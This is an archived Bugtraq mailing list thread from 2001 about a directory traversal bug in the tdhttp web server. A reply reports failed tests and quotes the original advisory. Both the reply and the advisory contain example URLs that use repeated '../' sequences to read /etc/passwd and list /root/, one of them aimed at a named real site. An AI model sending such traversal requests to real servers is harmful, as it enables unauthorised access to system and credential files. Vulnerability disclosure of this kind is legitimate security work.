Bugtraq mailing list archives
Re: tdhttp transversal bug
From: sekure <sekure () hadrion com br>
Date: Tue, 13 Feb 2001 16:25:32 -0300
Hello, I done others tests...and didn't work here again in my 3 Server linux...look: http://192.168.151.100/../../../../../../../../../../etc/passwd http://192.168.151.150/../../../../../../../../../../etc/passwd http://192.168.151.1/../../../../../../../../../../etc/passwd All return me this message: Bad Request Your browser sent a request that this server could not understand. Invalid URI in request GET /../../../../../../../../../../etc/passwd HTTP/1.1 Thakz [ ]'s -----Mensagem original----- De: UkR-XblP? <cuctema () OK RU> Para: BUGTRAQ () SECURITYFOCUS COM <BUGTRAQ () SECURITYFOCUS COM> Data: Segunda-feira, 12 de Fevereiro de 2001 21:17 Assunto: tdhttp transversal bug
-=-=-=-=-=[ UkR security team - advisory n0. 7 ]=-=-=-=-=- tdhttp transversal bug -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: 07.02.2001 Problem: possibility of arbitrary file retreival and directory listing on remote host, running tdhttp (http.c, probably all its versions). Workaround: try another http daemon (Apache, for ex.) and disable http service 'till that time. Comment: duh. I wonder if I can see /etc/passwd right in my IE window. No matter it's only beta version, I mean http.c. After all, this bug is well-known. Authors: XblP, S1LENCE Example: http://www.timduff.com/../../../../../../../../../../etc/passwd http://www.timduff.com/../../../../../../../../../../root/ Get your free e-mail address at http://www.zmail.ru
Current thread:
- tdhttp transversal bug UkR-XblP (Feb 12)
- <Possible follow-ups>
- Re: tdhttp transversal bug sekure (Feb 13)